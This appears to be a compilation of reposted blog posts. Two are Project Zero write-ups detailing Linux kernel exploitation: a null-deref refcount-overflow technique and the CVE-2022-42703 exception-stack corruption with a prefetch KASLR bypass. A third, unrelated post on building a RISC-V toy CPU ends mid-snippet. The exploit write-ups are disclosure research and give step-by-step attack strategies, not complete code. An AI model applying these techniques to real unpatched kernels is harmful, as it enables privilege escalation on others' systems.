Exploiting null-dereferences in the Linux kernel

Exploiting null-dereferences in the Linux kernel

Original text by Seth Jenkins, Project Zero

For a fair amount of time, null-deref bugs were a highly exploitable kernel bug class. Back when the kernel was able to access userland memory without restriction, and userland programs were still able to map the zero page, there were many easy techniques for exploiting null-deref bugs. However with the introduction of modern exploit mitigations such as SMEP and SMAP, as well as mmap_min_addr preventing unprivileged programs from mmap’ing low addresses, null-deref bugs are generally not considered a security issue in modern kernel versions. This blog post provides an exploit technique demonstrating that treating these bugs as universally innocuous often leads to faulty evaluations of their relevance to security.

Kernel oops overview

At present, when the Linux kernel triggers a null-deref from within a process context, it generates an oops, which is distinct from a kernel panic. A panic occurs when the kernel determines that there is no safe way to continue execution, and that therefore all execution must cease. However, the kernel does not stop all execution during an oops — instead the kernel tries to recover as best as it can and continue execution. In the case of a task, that involves throwing out the existing kernel stack and going directly to make_task_dead which calls do_exit. The kernel will also publish in dmesg a “crash” log and kernel backtrace depicting what state the kernel was in when the oops occurred. This may seem like an odd choice to make when memory corruption has clearly occurred — however the intention is to allow kernel bugs to more easily be detectable and loggable under the philosophy that a working system is much easier to debug than a dead one.

The unfortunate side effect of the oops recovery path is that the kernel is not able to perform any associated cleanup that it would normally perform on a typical syscall error recovery path. This means that any locks that were locked at the moment of the oops stay locked, any refcounts remain taken, any memory otherwise temporarily allocated remains allocated, etc. However, the process that generated the oops, its associated kernel stack, task struct and derivative members etc. can and often will be freed, meaning that depending on the precise circumstances of the oops, it’s possible that no memory is actually leaked. This becomes particularly important in regards to exploitation later.

Reference count mismanagement overview

Refcount mismanagement is a fairly well-known and exploitable issue. In the case where software improperly decrements a refcount, this can lead to a classic UAF primitive. The case where software improperly doesn’t decrement a refcount (leaking a reference) is also often exploitable. If the attacker can cause a refcount to be repeatedly improperly incremented, it is possible that given enough effort the refcount may overflow, at which point the software no longer has any remotely sensible idea of how many refcounts are taken on an object. In such a case, it is possible for an attacker to destroy the object by incrementing and decrementing the refcount back to zero after overflowing, while still holding reachable references to the associated memory. 32-bit refcounts are particularly vulnerable to this sort of overflow. It is important however, that each increment of the refcount allocates little or no physical memory. Even a single byte allocation is quite expensive if it must be performed 232 times.

Example null-deref bug

When a kernel oops unceremoniously ends a task, any refcounts that the task was holding remain held, even though all memory associated with the task may be freed when the task exits. Let’s look at an example — an otherwise unrelated bug I coincidentally discovered in the very recent past:

static int show_smaps_rollup(struct seq_file *m, void *v)
{
        struct proc_maps_private *priv = m->private;
        struct mem_size_stats mss;
        struct mm_struct *mm;
        struct vm_area_struct *vma;
        unsigned long last_vma_end = 0;
        int ret = 0;
        priv->task = get_proc_task(priv->inode); //task reference taken
        if (!priv->task)
                return -ESRCH;
        mm = priv->mm; //With no vma's, mm->mmap is NULL
        if (!mm || !mmget_not_zero(mm)) { //mm reference taken
                ret = -ESRCH;
                goto out_put_task;
        }
        memset(&mss, 0, sizeof(mss));
        ret = mmap_read_lock_killable(mm); //mmap read lock taken
        if (ret)
                goto out_put_mm;
        hold_task_mempolicy(priv);
        for (vma = priv->mm->mmap; vma; vma = vma->vm_next) {
                smap_gather_stats(vma, &mss);
                last_vma_end = vma->vm_end;
        }
        show_vma_header_prefix(m, priv->mm->mmap->vm_start,last_vma_end, 0, 0, 0, 0); //the deref of mmap causes a kernel oops here
        seq_pad(m, ' ');
        seq_puts(m, "[rollup]\n");
        __show_smap(m, &mss, true);
        release_task_mempolicy(priv);
        mmap_read_unlock(mm);
out_put_mm:
        mmput(mm);
out_put_task:
        put_task_struct(priv->task);
        priv->task = NULL;
        return ret;
}

This file is intended simply to print a set of memory usage statistics for the respective process. Regardless, this bug report reveals a classic and otherwise innocuous null-deref bug within this function. In the case of a task that has no VMA’s mapped at all, the task’s mm_struct mmap member will be equal to NULL. Thus the priv->mm->mmap->vm_start access causes a null dereference and consequently a kernel oops. This bug can be triggered by simply read’ing /proc/[pid]/smaps_rollup on a task with no VMA’s (which itself can be stably created via ptrace):

This kernel oops will mean that the following events occur:

  1. The associated struct file will have a refcount leaked if fdget took a refcount (we’ll try and make sure this doesn’t happen later)
  2. The associated seq_file within the struct file has a mutex that will forever be locked (any future reads/writes/lseeks etc. will hang forever).
  3. The task struct associated with the smaps_rollup file will have a refcount leaked
  4. The mm_struct’s mm_users refcount associated with the task will be leaked
  5. The mm_struct’s mmap lock will be permanently readlocked (any future write-lock attempts will hang forever)

Each of these conditions is an unintentional side-effect that leads to buggy behaviors, but not all of those behaviors are useful to an attacker. The permanent locking of events 2 and 5 only makes exploitation more difficult. Condition 1 is unexploitable because we cannot leak the struct file refcount again without taking a mutex that will never be unlocked. Condition 3 is unexploitable because a task struct uses a safe saturating kernel refcount_t which prevents the overflow condition. This leaves condition 4. 


The mm_users refcount still uses an overflow-unsafe atomic_t and since we can take a readlock an indefinite number of times, the associated mmap_read_lock does not prevent us from incrementing the refcount again. There are a couple important roadblocks we need to avoid in order to repeatedly leak this refcount:

  1. We cannot call this syscall from the task with the empty vma list itself — in other words, we can’t call read from /proc/self/smaps_rollup. Such a process cannot easily make repeated syscalls since it has no virtual memory mapped. We avoid this by reading smaps_rollup from another process.
  2. We must re-open the smaps_rollup file every time because any future reads we perform on a smaps_rollup instance we already triggered the oops on will deadlock on the local seq_file mutex lock which is locked forever. We also need to destroy the resulting struct file (via close) after we generate the oops in order to prevent untenable memory usage.
  3. If we access the mm through the same pid every time, we will run into the task struct max refcount before we overflow the mm_users refcount. Thus we need to create two separate tasks that share the same mm and balance the oopses we generate across both tasks so the task refcounts grow half as quickly as the mm_users refcount. We do this via the clone flag CLONE_VM
  4. We must avoid opening/reading the smaps_rollup file from a task that has a shared file descriptor table, as otherwise a refcount will be leaked on the struct file itself. This isn’t difficult, just don’t read the file from a multi-threaded process.

Our final refcount leaking overflow strategy is as follows:

  1. Process A forks a process B
  2. Process B issues PTRACE_TRACEME so that when it segfaults upon return from munmap it won’t go away (but rather will enter tracing stop)
  3. Proces B clones with CLONE_VM | CLONE_PTRACE another process C
  4. Process B munmap’s its entire virtual memory address space — this also unmaps process C’s virtual memory address space.
  5. Process A forks new children D and E which will access (B|C)’s smaps_rollup file respectively
  6. (D|E) opens (B|C)’s smaps_rollup file and performs a read which will oops, causing (D|E) to die. mm_users will be refcount leaked/incremented once per oops
  7. Process A goes back to step 5 ~232 times

The above strategy can be rearchitected to run in parallel (across processes not threads, because of roadblock 4) and improve performance. On server setups that print kernel logging to a serial console, generating 232 kernel oopses takes over 2 years. However on a vanilla Kali Linux box using a graphical interface, a demonstrative proof-of-concept takes only about 8 days to complete! At the completion of execution, the mm_users refcount will have overflowed and be set to zero, even though this mm is currently in use by multiple processes and can still be referenced via the proc filesystem.

Exploitation

Once the mm_users refcount has been set to zero, triggering undefined behavior and memory corruption should be fairly easy. By triggering an mmget and an mmput (which we can very easily do by opening the smaps_rollup file once more) we should be able to free the entire mm and cause a UAF condition:

static inline void __mmput(struct mm_struct *mm)
{
        VM_BUG_ON(atomic_read(&mm->mm_users));
        uprobe_clear_state(mm);
        exit_aio(mm);
        ksm_exit(mm);
        khugepaged_exit(mm);
        exit_mmap(mm);
        mm_put_huge_zero_page(mm);
        set_mm_exe_file(mm, NULL);
        if (!list_empty(&mm->mmlist)) {
                spin_lock(&mmlist_lock);
                list_del(&mm->mmlist);
                spin_unlock(&mmlist_lock);
        }
        if (mm->binfmt)
                module_put(mm->binfmt->module);
        lru_gen_del_mm(mm);
        mmdrop(mm);
}

Unfortunately, since 64591e8605 (“mm: protect free_pgtables with mmap_lock write lock in exit_mmap”), exit_mmap unconditionally takes the mmap lock in write mode. Since this mm’s mmap_lock is permanently readlocked many times, any calls to __mmput will manifest as a permanent deadlock inside of exit_mmap.

However, before the call permanently deadlocks, it will call several other functions:

  1. uprobe_clear_state
  2. exit_aio
  3. ksm_exit
  4. khugepaged_exit

Additionally, we can call __mmput on this mm from several tasks simultaneously by having each of them trigger an mmget/mmput on the mm, generating irregular race conditions. Under normal execution, it should not be possible to trigger multiple __mmput’s on the same mm (much less concurrent ones) as __mmput should only be called on the last and only refcount decrement which sets the refcount to zero. However, after the refcount overflow, all mmget/mmput’s on the still-referenced mm will trigger an __mmput. This is because each mmput that decrements the refcount to zero (despite the corresponding mmget being why the refcount was above zero in the first place) believes that it is solely responsible for freeing the associated mm.

This racy __mmput primitive extends to its callees as well. exit_aio is a good candidate for taking advantage of this:

void exit_aio(struct mm_struct *mm)
{
        struct kioctx_table *table = rcu_dereference_raw(mm->ioctx_table);
        struct ctx_rq_wait wait;
        int i, skipped;
        if (!table)
                return;
        atomic_set(&wait.count, table->nr);
        init_completion(&wait.comp);
        skipped = 0;
        for (i = 0; i < table->nr; ++i) {
                struct kioctx *ctx =
                rcu_dereference_protected(table->table[i], true);
                if (!ctx) {
                        skipped++;
                        continue;
                }
                ctx->mmap_size = 0;
                kill_ioctx(mm, ctx, &wait);
        }
        if (!atomic_sub_and_test(skipped, &wait.count)) {
                /* Wait until all IO for the context are done. */
                wait_for_completion(&wait.comp);
        }
        RCU_INIT_POINTER(mm->ioctx_table, NULL);
        kfree(table);
}

While the callee function kill_ioctx is written in such a way to prevent concurrent execution from causing memory corruption (part of the contract of aio allows for kill_ioctx to be called in a concurrent way), exit_aio itself makes no such guarantees. Two concurrent calls of exit_aio on the same mm struct can consequently induce a double free of the mm->ioctx_table object, which is fetched at the beginning of the function, while only being freed at the very end. This race window can be widened substantially by creating many aio contexts in order to slow down exit_aio’s internal context freeing loop. Successful exploitation will trigger the following kernel BUG indicating that a double free has occurred:

Note that as this exit_aio path is hit from __mmput, triggering this race will produce at least two permanently deadlocked processes when those processes later try to take the mmap write lock. However, from an exploitation perspective, this is irrelevant as the memory corruption primitive has already occurred before the deadlock occurs. Exploiting the resultant primitive would probably involve racing a reclaiming allocation in between the two frees of the mm->ioctx_table object, then taking advantage of the resulting UAF condition of the reclaimed allocation. It is undoubtedly possible, although I didn’t take this all the way to a completed PoC.

Conclusion

While the null-dereference bug itself was fixed in October 2022, the more important fix was the introduction of an oops limit which causes the kernel to panic if too many oopses occur. While this patch is already upstream, it is important that distributed kernels also inherit this oops limit and backport it to LTS releases if we want to avoid treating such null-dereference bugs as full-fledged security issues in the future. Even in that best-case scenario, it is nevertheless highly beneficial for security researchers to carefully evaluate the side-effects of bugs discovered in the future that are similarly “harmless” and ensure that the abrupt halt of kernel code execution caused by a kernel oops does not lead to other security-relevant primitives.

Exploiting CVE-2022-42703 — Bringing back the stack attack

Exploiting CVE-2022-42703 - Bringing back the stack attack

Original text by Seth Jenkins, Project Zero

This blog post details an exploit for CVE-2022-42703 (P0 issue 2351 — Fixed 5 September 2022), a bug Jann Horn found in the Linux kernel’s memory management (MM) subsystem that leads to a use-after-free on struct anon_vma. As the bug is very complex (I certainly struggle to understand it!), a future blog post will describe the bug in full. For the time being, the issue tracker entry, this LWN article explaining what an anon_vma is and the commit that introduced the bug are great resources in order to gain additional context.

Setting the scene

Successfully triggering the underlying vulnerability causes folio->mapping to point to a freed anon_vma object. Calling madvise(…, MADV_PAGEOUT)can then be used to repeatedly trigger accesses to the freed anon_vma in folio_lock_anon_vma_read():

struct anon_vma *folio_lock_anon_vma_read(struct folio *folio,
					  struct rmap_walk_control *rwc)
{
	struct anon_vma *anon_vma = NULL;
	struct anon_vma *root_anon_vma;
	unsigned long anon_mapping;

	rcu_read_lock();
	anon_mapping = (unsigned long)READ_ONCE(folio->mapping);
	if ((anon_mapping & PAGE_MAPPING_FLAGS) != PAGE_MAPPING_ANON)
		goto out;
	if (!folio_mapped(folio))
		goto out;

	// anon_vma is dangling pointer
	anon_vma = (struct anon_vma *) (anon_mapping - PAGE_MAPPING_ANON);
	// root_anon_vma is read from dangling pointer
	root_anon_vma = READ_ONCE(anon_vma->root);
	if (down_read_trylock(&root_anon_vma->rwsem)) {
[...]
		if (!folio_mapped(folio)) { // false
[...]
		}
		goto out;
	}

	if (rwc && rwc->try_lock) { // true
		anon_vma = NULL;
		rwc->contended = true;
		goto out;
	}
[...]
out:
	rcu_read_unlock();
	return anon_vma; // return dangling pointer
}

One potential exploit technique is to let the function return the dangling anon_vma pointer and try to make the subsequent operations do something useful. Instead, we chose to use the down_read_trylock() call within the function to corrupt memory at a chosen address, which we can do if we can control the root_anon_vma pointer that is read from the freed anon_vma.

Controlling the root_anon_vma pointer means reclaiming the freed anon_vma with attacker-controlled memory. struct anon_vma structures are allocated from their own kmalloc cache, which means we cannot simply free one and reclaim it with a different object. Instead we cause the associated anon_vma slab page to be returned back to the kernel page allocator by following a very similar strategy to the one documented here. By freeing all the anon_vma objects on a slab page, then flushing the percpu slab page partial freelist, we can cause the virtual memory previously associated with the anon_vma to be returned back to the page allocator. We then spray pipe buffers in order to reclaim the freed anon_vma with attacker controlled memory.

At this point, we’ve discussed how to turn our use-after-free into a down_read_trylock() call on an attacker-controlled pointer. The implementation of down_read_trylock() is as follows:

struct rw_semaphore {
	atomic_long_t count;
	atomic_long_t owner;
	struct optimistic_spin_queue osq; /* spinner MCS lock */
	raw_spinlock_t wait_lock;
	struct list_head wait_list;
};

...

static inline int __down_read_trylock(struct rw_semaphore *sem)
{
	long tmp;

	DEBUG_RWSEMS_WARN_ON(sem->magic != sem, sem);

	tmp = atomic_long_read(&sem->count);
	while (!(tmp & RWSEM_READ_FAILED_MASK)) {
		if (atomic_long_try_cmpxchg_acquire(&sem->count, &tmp,
						    tmp + RWSEM_READER_BIAS)) {
			rwsem_set_reader_owned(sem);
			return 1;
		}
	}
	return 0;
}

It was helpful to emulate the down_read_trylock() in unicorn to determine how it behaves when given different sem->count values. Assuming this code is operating on inert and unchanging memory, it will increment sem->count by 0x100 if the 3 least significant bits and the most significant bit are all unset. That means it is difficult to modify a kernel pointer and we cannot modify any non 8-byte aligned values (as they’ll have one or more of the bottom three bits set). Additionally, this semaphore is later unlocked, causing whatever write we perform to be reverted in the imminent future. Furthermore, at this point we don’t have an established strategy for determining the KASLR slide nor figuring out the addresses of any objects we might want to overwrite with our newfound primitive. It turns out that regardless of any randomization the kernel presently has in place, there’s a straightforward strategy for exploiting this bug even given such a constrained arbitrary write.

Stack corruption…

On x86-64 Linux, when the CPU performs certain interrupts and exceptions, it will swap to a respective stack that is mapped to a static and non-randomized virtual address, with a different stack for the different exception types. A brief documentation of those stacks and their parent structure, the cpu_entry_area, can be found here. These stacks are most often used on entry into the kernel from userland, but they’re used for exceptions that happen in kernel mode as well. We’ve recently seen KCTF entries where attackers take advantage of the non-randomized cpu_entry_area stacks in order to access data at a known virtual address in kernel accessible memory even in the presence of SMAP and KASLR. You could also use these stacks to forge attacker-controlled data at a known kernel virtual address. This works because the attacker task’s general purpose register contents are pushed directly onto this stack when the switch from userland to kernel mode occurs due to one of these exceptions. This also occurs when the kernel itself generates an Interrupt Stack Table exception and swaps to an exception stack — except in that case, kernel GPR’s are pushed instead. These pushed registers are later used to restore kernel state once the exception is handled. In the case of a userland triggered exception, register contents are restored from the task stack.

One example of an IST exception is a DB exception which can be triggered by an attacker via a hardware breakpoint, the associated registers of which are described here. Hardware breakpoints can be triggered by a variety of different memory access types, namely reads, writes, and instruction fetches. These hardware breakpoints can be set using ptrace(2), and are preserved during kernel mode execution in a task context such as during a syscall. That means that it’s possible for an attacker-set hardware breakpoint to be triggered in kernel mode, e.g. during a copy_to/from_user call. The resulting exception will save and restore the kernel context via the aforementioned non-randomized exception stack, and that kernel context is an exceptionally good target for our arbitrary write primitive.

Any of the registers that copy_to/from_user is actively using at the time it handles the hardware breakpoint are corruptible by using our arbitrary-write primitive to overwrite their saved values on the exception stack. In this case, the size of the copy_user call is the intuitive target. The size value is consistently stored in the rcx register, which will be saved at the same virtual address every time the hardware breakpoint is hit. After corrupting this saved register with our arbitrary write primitive, the kernel will restore rcx from the exception stack once it returns back to copy_to/from_user. Since rcx defines the number of bytes copy_user should copy, this corruption will cause the kernel to illicitly copy too many bytes between userland and the kernel.

…begets stack corruption

The attack strategy starts as follows:

  1. Fork a process Y from process X.
  2. Process X ptraces process Y, then sets a hardware breakpoint at a known virtual address [addr] in process Y.
  3. Process Y makes a large number of calls to uname(2), which calls copy_to_user from a kernel stack buffer to [addr]. This causes the kernel to constantly trigger the hardware watchpoint and enter the DB exception handler, using the DB exception stack to save and restore copy_to_user state
  4. Simultaneously make many arbitrary writes at the known location of the DB exception stack’s saved rcx value, which is Process Y’s copy_to_user’s saved length.

The DB exception stack is used rarely, so it’s unlikely that we corrupt any unexpected kernel state via a spurious DB exception while spamming our arbitrary write primitive. The technique is also racy, but missing the race simply means corrupting stale stack-data. In that case, we simply try again. In my experience, it rarely takes more than a few seconds to win the race successfully.

Upon successful corruption of the length value, the kernel will copy much of the current task’s stack back to userland, including the task-local stack cookie and return addresses. We can subsequently invert our technique and attack a copy_from_user call instead. Instead of copying too many bytes from the kernel task stack to userland, we elicit the kernel to copy too many bytes from userland to the kernel task stack! Again we use a syscall, prctl(2), that performs a copy_from_user call to a kernel stack buffer. Now by corrupting the length value, we generate a stack buffer overflow condition in this function where none previously existed. Since we’ve already leaked the stack cookie and the KASLR slide, it is trivially easy to bypass both mitigations and overwrite the return address.

Completing a ROP chain for the kernel is left as an exercise to the reader.

Fetching the KASLR slide with prefetch

Upon reporting this bug to the Linux kernel security team, our suggestion was to start randomizing the location of the percpu cpu_entry_area (CEA), and consequently the associated exception and syscall entry stacks. This is an effective mitigation against remote attackers but is insufficient to prevent a local attacker from taking advantage. 6 years ago, Daniel Gruss et al. discovered a new more reliable technique for exploiting the TLB timing side channel in x86 CPU’s. Their results demonstrated that prefetch instructions executed in user mode retired at statistically significant different latencies depending on whether the requested virtual address to be prefetched was mapped vs unmapped, even if that virtual address was only mapped in kernel mode. kPTI was helpful in mitigating this side channel, however, most modern CPUs now have innate protection for Meltdown, which kPTI was specifically designed to address, and thusly kPTI (which has significant performance implications) is disabled on modern microarchitectures. That decision means it is once again possible to take advantage of the prefetch side channel to defeat not only KASLR, but also the CPU entry area randomization mitigation, preserving the viability of the CEA stack corruption exploit technique against modern X86 CPUs.

There are surprisingly few fast and reliable examples of this prefetch KASLR bypass technique available in the open source realm, so I made the decision to write one.

Implementation

The meat of implementing this technique effectively is in serially reading the processor’s time stamp counter before and after performing a prefetch. Daniel Gruss helpfully provided highly effective and open source code for doing just that. The only edit I made (as suggested by Jann Horn) was to swap to using lfence instead of cpuid as the serializing instruction, as cpuid is emulated in VM environments. It also became apparent in practice that there was no need to perform any cache-flushing routines in order to witness the side-channel effect. It is simply enough to time every prefetch attempt.

Generating prefetch timings for all 512 possible KASLR slots yields quite a bit of fuzzy data in need of analyzing. To minimize noise, multiple samples of each tested address are taken, and the minimum value from that set of samples is used in the results as the representative value for an address. On the Tiger Lake CPU this test was primarily performed on, no more than 16 samples per slot were needed to generate exceptionally reliable results. Low-resolution minimum prefetch time slot identification narrows down the area to search in while avoiding false positives for the higher resolution edge-detection code which finds the precise address at which prefetch dramatically drops in run-time. The result of this effort is a PoC which can correctly identify the KASLR slide on my local machine with 99.999% accuracy (95% accuracy in a VM) while running faster than it takes to grep through kallsyms for the kernel base address:

This prefetch code does indeed work to find the locations of the randomized CEA regions in Peter Ziljstra’s proposed patch. However, the journey to that point results in code that demonstrates another deeply significant issue — KASLR is comprehensively compromised on x86 against local attackers, and has been for the past several years, and will be for the indefinite future. There are presently no plans in place to resolve the myriad microarchitectural issues that lead to side channels like this one. Future work is needed in this area in order to preserve the integrity of KASLR, or alternatively, it is probably time to accept that KASLR is no longer an effective mitigation against local attackers and to develop defensive code and mitigations that accept its limitations.

Conclusion

This exploit demonstrates a highly reliable and agnostic technique that can allow a broad spectrum of uncontrolled arbitrary write primitives to achieve kernel code execution on x86 platforms. While it is possible to mitigate this exploit technique from a remote context, an attacker in a local context can utilize known microarchitectural side-channels to defeat the current mitigations. Additional work in this area might be valuable to continue to make exploitation more difficult, such as performing in-stack randomization so that the stack offset of the saved state changes on every taken IST exception. For now however, this remains a viable and powerful exploit strategy on x86 Linux.

How a CPU works: Bare metal C on my RISC-V toy CPU

How a CPU works: Bare metal C on my RISC-V toy CPU

Original text by FLORIAN NOEDING’S BLOG

I always wanted to understand how a CPU works, how it transitions from one instruction to the next and makes a computer work. So after reading Ken Shirrif’s blog about a bug fix in the 8086 processor I thought: Well, let’s try to write one in a hardware description language. This post is a write up of my learning experiment.

I’ll walk through my steps of creating an emulator, compiling and linking C for bare metal, CPU design and finally the implementation of my toy RISC-V CPU.

Goals 

  • implement a CPU in a hardware description language (HDL),
  • code must be synthesizable (except memory),
  • simulate it,
  • and run a bare metal C program on it.

While I had plenty research time, I had only about 30 hours of development time. Without prior hardware design experience the goals had to be simple enough:

  • RISC V Integer instruction set only (minus system and break calls),
  • no interrupt handling or other complexities,
  • no or only minimal optimizations.

My test program written in C is Conway’s game of life, try the interactive web version.

In a future iteration I plan to run my project on a real FPGA and implement a memory controller. Let’s say I made it to about 85% of what I wanted to achieve.

Write an emulator 

Writing an emulator, i.e. a program that can execute the instructions of a CPU, is an excellent stepping stone towards a hardware implementation. For me — without a hardware background — it is much easier to reason about and learn the instruction set.

So my first step was to understand the RISC V instruction set. The RISC V specification is quite long, but I only needed chapters 2 (integer instruction set), 19 (RV32 / 64G instruction set listings) and 20 (assembly programmer’s handbook). These give detailed definitions of how each instruction must be executed, what kind of registers must be implemented, etc.

Let’s look at an example: Arithmetic / logical instructions operating on a register and an immediate value. For 

ADDI
 (add immediate) the following is done: 
rd &lt;- rs1 + imm
: The register identified by rd is set to the sum of the value stored in register rs1 and the value given in the instruction itself.

The emulator is implemented in C++ with a C-style interface in a shared library. This makes it easy to hook it into Python via cffi. This saved me quite a bit of time for file system and user interactions, which were all done in Python.

truct RV32EmuState;

extern "C" RV32EmuState* rv32emu_init();
extern "C" void rv32emu_free(RV32EmuState *state);

extern "C" void rv32emu_set_rom(RV32EmuState *state, void *data, uint32_t size);
extern "C" void rv32emu_read(RV32EmuState *state, uint32_t addr, uint32_t size, void *p);

extern "C" int32_t rv32emu_step(RV32EmuState *state);
extern "C" int32_t rv32emu_run(RV32EmuState *state, uint32_t *breakpoints, uint32_t num_breakpoints);

extern "C" void rv32emu_print(RV32EmuState *state);

The core of the emulator is the 

rv32emu_step
 function, which executes exactly one instruction and then returns. In RISC V each instruction is exactly 32 bits. It first decodes the op code (what kind of operation) and then the specific operation (e.g. ADD immediate). It’s a large, nested switch.

int32_t rv32emu_step(RV32EmuState *state) {
    uint32_t *instr_p = (uint32_t*)(_get_pointer(state, state->pc));
    uint32_t instr = *instr_p;

    // decode
    uint32_t opcode = instr & 0x7F; // instr[6..0]

    switch(opcode) {
        //
        // ... all opcode types ...
        //
        case OPCODE_OP_IMM: {
            uint32_t funct3 = (instr >> 12) & 0x07; // instr[14..12]
            uint32_t rs1 = ((instr >> 15) & 0x1F);

            uint32_t imm = (instr >> 20) & 0x0FFF; // 12 bits
            uint32_t imm_sign = instr & (1ul << 31);
            if(imm_sign) {
                imm |= 0xFFFFF000;
            }

            uint32_t data1 = state->reg[rs1];
            uint32_t data2 = imm;
            uint32_t reg_dest = (instr >> 7) & 0x1F;
            if(reg_dest != 0) { // register 0 is always zero and never written too
                switch(funct3) {
                    //
                    // ... all OP_IMM instructions ...
                    //
                    case FUNCT3_OP_ADD: {
                        state->reg[reg_dest] = data1 + data2;
                        break;
                    }
                }
            }
            break;
        }

    // ...

    state->pc += 4; // go to next instruction for non-jump / non-branch
    return 0;
}

The mathematical and logical operations are simplest to implement, so I started with them. Iteratively I’ve added branches, jumps and the remaining logic until I had covered all instructions other than 

ECALL
 and 
EBREAK
. These two were not necessary for my bare metal experiment.

For testing I relied on simple hand-written assembly code. Of course this did not exercise my emulator thoroughly. So as a next step I wanted to finally run my Conway’s game of life simulation.

Cross compiling, linking and ELF to bin 

Going from C to a bare metal CPU takes a few steps: cross compile, ensure proper memory layout and converting the ELF file to a binary blob. Also instead of having a 

main
 function my code has a 
_start
function defined as follows:

void __attribute__((section (".text.boot"))) _start() {
    run(); // call the actual "entrypoint"
}

I’ll explain the details later.

My CPU only supports the RISC-V 32 bit integer instruction set, but my host system is running on x86-64. So I needed a cross compiler and used the Ubuntu package 

gcc-riscv64-unknown-elf
. Then I could compile my code using the following command:

riscv64-unknown-elf-gcc -march=rv32i -mabi=ilp32 \
    -nostdlib -ffreestanding -Tprograms/memory_map.ld \
    -o life.rv32.elf life.c

Let’s take this apart:

  1. execute the RISC-V cross-compiler
  2. set it’s architecture to rv32i, which is RISC-V 32bit integer instruction set
  3. define the application binary interface, i.e. conventions how to emit assembly. This makes it so that integers, longs and pointers are 32 bit
    • these three are needed to emit code compatible with my emulator and later CPU
  4. compile without a standard library
    • Standard libraries like the system libc assume operating system support, but my toy CPU will be running bare metal. So we have to switch that off. This means we won’t have access to 
      malloc
      printf
      puts
       etc. Instead we’ll need to implement this ourselves, if we want to use it. This means we have no startup code either.
  5. compile freestanding, that is, do not assume presence of a operating system or library and switch of libc specific optimizations and defaults
    • for example we won’t have a main function, which is otherwise required
  6. use a memory map
    • we need to tell the compiler and linker where instructions and global variables will be placed in memory. We do not have a loader to do this at application startup

Even though we do not yet have any hardware, we must make a few decisions for item 6: how should our address space look like?

  • program execution starts at 0x1000, which below I’ll call rom for read-only-memory
  • memory for globals, stack variables and heap will be located at 0x10000000

These values are kind of arbitrary. I wanted to avoid having code at address zero to avoid issues with NULL pointers. This script also ensures that our program entry point, the function 

_start
 is placed at 0x1000, so that the emulator will execute that code first. Here’s my linker script for my address space setup:

ENTRY(_start)

MEMORY
{
    rom (rx ): ORIGIN = 0x00001000, LENGTH = 16M
    ram (rw): ORIGIN = 0x10000000, LENGTH = 32M
}

SECTIONS
{
    .text : {
        /*
            entry point is expected to be the first function here
            --> we are assuming there's only a single function in the .text.boot segment and by convention that is "_start"

            KEEP ensures that "_start" is kept here, even if there are no references to it
        */
        KEEP(*(.text.boot))

        /*
            all other code follows
        */
        *(.text*)
    } > rom

    .rodata : { *(.rodata*) } > rom

    .bss : { *(.bss*) } > ram
}

After compilation we can check that 

_start
 is actually at 0x1000:

riscv64-unknown-elf-readelf -s life.rv32.elf | grep '_start$$'

Now the “problem” is that gcc generates an ELF and not just a stream of instructions. The Executable and Linkable Format is simplified a container to store executable code, data and metadata in a way that makes it easy to later load into memory. As specified by the memory map like the one above. Since my program is fairly it simple does not need memory initialization. So we can simply dump the RISC-V instructions from the .text segment into a binary file.

riscv64-unknown-elf-objdump -O binary life.rv32.elf life.rv32.bin

So now the C snippet from above should make more sense:

void __attribute__((section (".text.boot"))) _start() {
    run();
}

We are defining a function 

_start
 which should go into the segment 
.text.boot
. The linker script instructs the toolchain to make sure this code is placed at 0x1000, even when no other code references it. By having exactly one function in 
.text.boot
 this is guaranteed to happen.

Turns out this is still not enough to make the code work. The startup code above does not initialize the stack pointer, i.e. where local variables live in memory. I decided to simplify things and hard-code the initial stack pointer value in my emulator and CPU. This means simply setting register 

x2
 also known as 
sp
 to the end of the memory, here 0x12000000.

A couple other registers defined in the ABI with special purpose are not used by my program, so I did not implement support: global pointer 

gp
 and thread pointer 
tp
.

No standard library 

When the program is running on my host I rely on the standard library for memory allocation like 

malloc
 or 
putchar
 for output. But when running bare metal these functions are not available.

I’ve replaced dynamic memory allocation with static memory assignments. Since my program is the only one running on CPU, I can use all resources how I see fit. If the flag 

FREESTANDING
 is set, when the program is compiled for my RISC-V emulator / CPU. Without it, the program can run as-is on my host system like any other program.

void run() {
    #ifdef FREESTANDING
        map0 = (unsigned char*)0x10080000;                              // gamestate
        map1 = map0 + 0x80000;                                          // new gamestate
        leds = map1 + 0x80000;                                          // output for emulator
    #else
        map0 = (unsigned char*)malloc((WIDTH + 2) * (HEIGHT + 2));
        map1 = (unsigned char*)malloc((WIDTH + 2) * (HEIGHT + 2));
    #endif

    // ...
}

Instead of relying on 

putchar
 for output to the console, my program assumes that the address of the variable 
leds
 is memory-mapped to an external LED array. In case of the emulator, it will simply read this memory area and display it on console. When running in the simulator (or FPGA in the next iteration), the memory controller will set output pins accordingly.

Emulator in action 

Here’s the result of all of that work: First setting a breakpoint for each game of life cycle, and then manually stepping through the program on the emulated CPU.

Best viewed in full-screen mode due to web-unfriendly layout.

CPU overview 

With the emulator completed I now have a working reference system to debug my CPU. And so I started working implementing it.

A simple CPU consists of the following components:

  • Arithmetic Logic Unit (ALU): the compute part, for operations like “add” or “xor”
  • Register File: provides and stores register values
  • Decoder: transform instruction to a set of control signals, controlling the CPU operation
  • Program Counter: manages the address where the next instruction is found
  • Load Store Unit (LSU): connects the CPU to its memory
  • Control Unit: tieing all the parts together to form a CPU

These are the basic elements of a CPU and sufficient for my toy RISC-V implementation.

Describing hardware in code 

Hardware is designed with special programming languages, called hardware description languages (HDL). The most common ones are Verilog and VHDL. For my project I decided to use Amaranth HDL, because it’s higher level and easier to use — plus it’s written in my favorite language Python. Simplified it enables an engineer to describe a program in Python that generates a hardware description, instead of directly describing it directly in Verilog or VHDL. A nice property of Amaranth HDL is that by design the resulting programs are synthesizable, i.e. they can be “compiled” into a description executable in FPGAs or built as an ASIC.

A key difference between software and hardware is concurrency: In software code is executed line by line, in order and we need special constructs like threads to achieve parallelism. In hardware it’s different: Everything is happening at the same time. We are not describing high-level operations, but rather how logic gates are connected to each other.

Combinational logic 

There are two key concepts in hardware: combinational logic (sometimes also called combinatorial logic) and synchronous logic. Simplified combinational logic executes all the time and all at the same time. In the following example green are input signals, yellow are internal signals (output of logic and input to the next logic), blue is logic and orange is the final output signal:

Combinational logic always updates its output immediately when any input changes. There are a couple physical limitations here, but we’ll simplify this for now. This means changing any signal will immediately change the output signal 

sum
.

In Amaranth we can implement this as

# to run tests: python3 -m pytest add3.py

import pytest

from amaranth import Signal, Module, Elaboratable
